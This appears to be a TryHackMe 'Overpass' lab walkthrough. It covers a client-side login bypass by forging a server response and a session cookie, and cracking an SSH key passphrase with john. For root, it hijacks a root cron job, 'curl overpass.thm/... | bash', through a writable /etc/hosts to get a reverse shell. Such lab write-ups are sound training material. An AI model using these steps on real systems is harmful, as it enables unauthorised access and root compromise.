Overpass TryHackMe Walkthrough
Hello guys back again with another walkthrough this time am going to be tacking Overpass from TryHackMe. It was rated as an easy box and beginner friendly but according to my opinion the initial foothold might be a bit of a stretch for someone who hasn’t used burpsuite before but the box itself is really cool thanks to the creator of the box NinjaJc01. The box starts off by finding a web server that has an admin panel but to use the admin panel you are required to provide valid credentials. Doing some static code analysis on JavaScript files you realize you can bypass authentication an gain access to the administrator’s panel ,get some SSH private keys crack some hashes with john the ripper and finally login to the box as the user James. The privilege escalation is pretty simple but really amazing given the fact that i have never seen this before in any other box. You find that the hosts file is world writable and you find that there’s a cronjob that running every minute that executes using a bash script using a hostname. Exploit it and get root on the box. Without much say let’s jump in
As always we’ll start off with a nmap scan of the box. This as i always say we’ll give us really useful information on the services that are running on the box and we might might get lucky and find an outdated service that has a 1 day exploit and be able to compromise the box that way
Looking at the nmap results we see two ports are open SSH and HTTP
SSH doesn’t have that much vulnerability hence i will start with enumerating HTTP. We can leave a SSH bruteforce running in the background but without a valid username it is going to be really hard even to perform a bruteforce attack so I’ll start to enumerate HTTP.
Opening the webpage using Mozilla we get a standard webpage probably used to advertise a password manager application called overpass
Before poking at the websites manually i decided to do some automated enumeration using gobuster. What gobuster normally does is perform directory bruteforce using a wordlist and we might be lucky and get some interesting directories
While gobuster is running in the background lets enumerate the website manually. First let’s see if robots.txt exists (It just a file that tell web spiders where or what not to crawl)
But as seen above we didn’t get lucky. I decided to view page source sometimes developers leave comments that makes it easy to exploit a server.
And as seen below we get some comments but they don’t seem too meaningful
Since i hit a dead end i decided to go and see if gobuster had found anything useful that could give us an idea on what to exploit
And as seen above we found some interesting directories like /admin
I decided to take a look at it first. On opening /admin
The first things i try when i see a login page is dumb credentials example of which include
admin:admin
admin:password
guest:guest
admin:12345
But in this case i got incorrect credentials.
Next i tried SQL Injection beacuse if we find that the webpage is injectable we might be lucky and be able to dump user credentials
But since i don’t want to waste time testing it I’ll assure you the web application is not SQL Injectable
So i decided to see what files the web application calls every time we try to login using Mozilla developers tool(network tab) and found an interesting file login.js
I decided to take a look at the JavaScript file and see if I’ll find anything useful like credentials. The function that i want us to concentrate on is the login function as seen below
The code that I’ve highlighted is the vulnerable code that will let us bypass the login page
What the code says is that if the server responds with “Incorrect credentials” don’t allow that person to get access to the administrator’s panel but if the server doesn’t responds with “Incorrect credentials” give that particular person a session token and give him access to the administrative panel. That code looks neat……… what could go wrong since we can trust the information from the server??????
What the developers of the webpage didn’t consider is that by using burpsuite we could also control the response that comes from the web server. And we will trick login.js file to think that “Hey we are authenticated by the web server ” and this will give us access to the administrator’s panel.
Let’s see this magic happen below
First we’ll intercept the login request with burpsuite
Then right click and click on do intercept then click on response from this request
And as seen below the server responds to the request with “Incorrect credentials”
Let’s modify the response to look as the one down below
HTTP/1.1 302 FOUND
Date: Mon, 20 Jul 2020 14:33:13 GMT
Content-Length: 21
Content-Type: text/plain; charset=utf-8
Connection: close
location: /admin
And then forward the response
Then let’s go back to the webpage and refresh the tab
And like magic we get logged in with no valid credentials
Just like that fun right???????
The second method of bypassing the login page was suggested by one of the readers all thanks to Ahmed Koraiem and its way easy and I’ve actually come to love it since it’s really easy to use. The web application also doesn’t check the cookie to determine whether they are valid or not so we can just create our own cookie and make ourselves admin as you’ll see below
Opening Mozilla developers tools console tab which basically runs JavaScript command “document.cookie” we can add our own cookie using the following command
document.cookie in java script can create,read and delete cookie. In our case we want to use this functionality to create a cookie
document.cookie="SessionToken=pleaselogmein"
As seen below
Then running the command
Now refreshing the web page
We get logged in
And that’s the second method we could bypass the login page
And after logging into the box we get really useful information
1. We get that there are two users on the box namely
a) James
B) Paradox
2. We find some ssh keys and after reading the paradox's post we get that it's James' SSH private keys
So i copied the SSH private keys to my localbox and taking a closer look at it we see that it’s encrypted. Meaning we’ll need a passphrase to be able to use the SSH key but unlucky for us we don’t know the passphrase
Lucky for us we can us john the ripper (a well known hash cracker)and a binary called ssh2john which converts the SSH private key to a hash format that john the ripper can understand and crack the passphrase using a wordlist
Let’s see this in action
First we’ll need to generate the hash using ssh2john
And as seen above we were able to generate a hash now we should save it to a file and get cracking. And after sometime john the ripper was able to crack the passphrase as seen below
Sweet now we can login to the box via ssh using that passphrase.
And voila as seen above we are in. We successful gotten a shell on the box. Sweet now it’s time for privilege escalation but before that
We can submit the user flag and get the points
Next thing i did was to run linpeas which automatically finds privilege escalation vectors. It’s really an awesome script and I’ve really grown fond of it while am doing any pentest since it also uses really awesome colors in the output
Looking at the output of linpeas
We find that there’s a cronjob running every minute
Which executes curl
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
What makes the cronjob even more interesting is that it’s running as root meaning if we exploit it we’ll be root. But how?????
I decided to continue looking at the linpeas output
And i found a really odd file which in normal occasions it is only writable by root but in this case we had write access to it. The file is
/etc/hosts
Now the cronjob starts making sense right?????
The curl command from the cronjob was using a hostname(overpass.thm) and we have control to the hosts file. Meaning we can spoof the hostname to make the cronjob think that the hostname is from our IP Address meaning when the cronjob will run it will be connecting to our IP Address
But let’s take a closer look at the command being ran
curl overpass.thm/downloads/src/buildscript.sh | bash
First we need to create a web server on our box which the curl will be connecting to
Second we must replicate all the directories [/downloads/src/] in our web server as in the command(cronjob) or else every time the curl command will be running it will be getting a 404 NOT FOUND and in the last directory we create that buildcript.sh bash script
Let’s see this in practise
1. Create all those directories in our local web server
2. in buildscript.sh create a bash reverse shell that will be connecting back to our box as seen below
3. Start a web server on our local machine as seen below
4. Create a netcat listener on our local box which will allow root connect back to us when the cronjob is executed
5. Next add our IP Address to overpass-procd machine in the hosts file and link that IP Address with overpass.thm hostname
6. Now we play the waiting game
And after a few seconds we get a rootshell
Now we can submit the root flag and increase our points
And the box is pretty much done!!!!!
Am really expecting feedback and if any concept has not been explained fully you guys can tell me in the response so i can see how to explain it further but that’s it for now guys till next time take care
And if you liked the walthrough you can clap for me down below. Thanks guys